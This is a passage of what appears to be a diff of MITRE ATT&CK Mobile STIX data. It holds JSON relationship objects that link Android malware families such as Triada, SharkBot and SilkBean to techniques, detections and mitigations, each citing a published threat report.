"2020-12-18T20:14:47.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020.", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:48:00.045Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has registered several broadcast receivers.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c6a32f64-3105-4a94-8172-28ac0e10dd93", + "created": "2023-03-20T18:21:59.396Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:21:59.396Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--75ed2348-279f-4485-97a3-9a5ada27d799", + "created": "2023-02-06T19:06:17.406Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:06:17.406Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can disable Play Protect.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--80778a1e-715d-477b-87fa-e92181b31659", + "created": "2020-12-24T21:45:56.967Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:22.472Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can delete various piece of device data, such as contacts, call logs, applications, SMS messages, email, plugins, and files in external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3b24a287-36e1-49b9-811d-c0080147ff57", + "created": "2023-03-20T18:41:47.754Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:47.754Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b6726136-3c20-4921-a0cb-75a66f59107c", + "type": "relationship", + "created": "2020-09-11T16:22:03.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.296Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect network configuration data from the device, including phone number, SIM operator, and network operator.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f947d845-4d70-41f3-ae3c-18ea8b44e667", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-21T18:51:23.251Z", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) can create fraudulent statistics inside the official Google Play Store, and has generated revenue from installing fraudulent apps and displaying malicious advertisements.(Citation: ArsTechnica-HummingBad)", + "relationship_type": "uses", + "source_ref": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57a069a0-399f-43ab-9efc-50432a41b26b", + "created": "2020-12-24T21:55:56.743Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:36:12.585Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has deleted or renamed specific files.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fe8ab9f-b207-4c39-ab5c-e929a1c949f9", + "created": "2019-07-16T14:33:12.113Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Krebs-Triada June 2019", + "url": "https://krebsonsecurity.com/2019/06/tracing-the-supply-chain-attack-on-android-2/", + "description": "Krebs, B. (2019, June 25). Tracing the Supply Chain Attack on Android. Retrieved July 16, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Triada](https://attack.mitre.org/software/S0424) was added into the Android system by a third-party vendor identified as Yehuo or Blazefire during the production process.(Citation: Google Triada June 2019)(Citation: Krebs-Triada June 2019)", + "modified": "2022-04-19T15:47:32.152Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cd9e8334-2ff6-4f64-993f-4e11a68ef7ca", + "created": "2023-03-20T18:58:19.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:19.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bbc6308e-f7f6-40c7-80cb-f760d623c8af", + "created": "2023-01-18T21:20:01.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:56:41.614Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use HTTP to send C2 messages to infected devices.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8", + "created": "2019-11-21T16:42:48.437Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:18.013Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect SMS messages.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--891edea2-817c-4eeb-9991-b6e095c269a8", + "created": "2020-06-02T14:32:31.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:40:06.957Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can retrieve the call history.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d32003ba-959b-4377-aa04-f75275c32abf", + "created": "2019-07-16T14:33:12.144Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Triada June 2019", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019.", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:40:27.131Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) utilized HTTP to exfiltrate data through POST requests to the command and control server.(Citation: Google Triada June 2019) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ebdc17d-401e-4f6a-af51-2dc57437b817", + "created": "2019-09-20T18:03:57.062Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android 10 Execute", + "url": "https://developer.android.com/about/versions/10/behavior-changes-all#execute-permission", + "description": "Android Developers. (n.d.). Behavior changes: all apps - Removed execute permission for app home directory. Retrieved September 20, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Applications that target Android API level 29 or higher cannot execute native code stored in the application's internal data storage directory, limiting the ability of applications to download and execute native code at runtime. (Citation: Android 10 Execute)", + "modified": "2022-04-01T18:37:44.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6ee69225-7c42-49e6-bfe4-c7009c82e76a", + "created": "2023-03-20T18:44:36.073Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:36.073Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--429a4b02-f774-4b1e-aaef-5fd9c654dd09", + "type": "relationship", + "created": "2021-02-08T16:36:20.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.596Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has exfiltrated local account data and calendar information as part of Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--148703c5-6d07-439c-a4ff-d77119c70857", + "created": "2023-03-20T18:52:21.767Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:21.767Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d886f368-a38b-4cb3-906f-9b284f58b369", + "type": "relationship", + "created": "2019-12-10T16:07:41.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2019-12-10T16:07:41.066Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) decrypts executables from archive files stored in the `assets` directory of the installation binary.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7de1af68-d893-40a0-b27a-c9010f5cdc62", + "created": "2023-03-20T18:57:14.194Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:14.194Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bfd0d9cb-27e2-42a2-9207-764bb1491962", + "created": "2022-03-30T19:54:07.548Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect devices with unauthorized or unsafe modifications. ", + "modified": "2022-03-30T19:54:07.548Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--66ba3094-7c14-41b9-b7c1-814d026156b9", + "type": "relationship", + "created": "2020-09-11T15:58:40.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-09-11T15:58:40.846Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can delete and send SMS messages.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f1130c77-3d20-4c41-9e75-1953bf9b8abc", + "created": "2020-09-14T14:13:45.286Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:40:48.237Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) has exfiltrated data using HTTP PUT requests.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--79c3fe5d-585b-401a-8bb4-84bfdc7252a1", + "created": "2022-04-06T13:52:46.831Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 7 changed how the Device Administrator password APIs function.", + "modified": "2022-04-06T13:52:46.831Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e5ccc5c7-11ee-4357-8dd4-bf23ce2111bb", + "created": "2020-12-24T22:04:28.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:41:54.548Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected call logs.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b3866c07-e143-4d0d-9176-c2845f85c5ab", + "created": "2023-01-18T19:58:21.223Z", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-01-18T19:58:21.223Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) has used RSA to encrypt the symmetric encryption key used for C2 messages.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d0c039cb-c815-4d9c-a100-a45f923bc65b", + "type": "relationship", + "created": "2020-12-24T21:45:56.981Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:45:56.981Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has access to the device’s location.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10560632-6449-4579-90eb-20fc46dcca08", + "created": "2020-10-29T19:21:23.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + 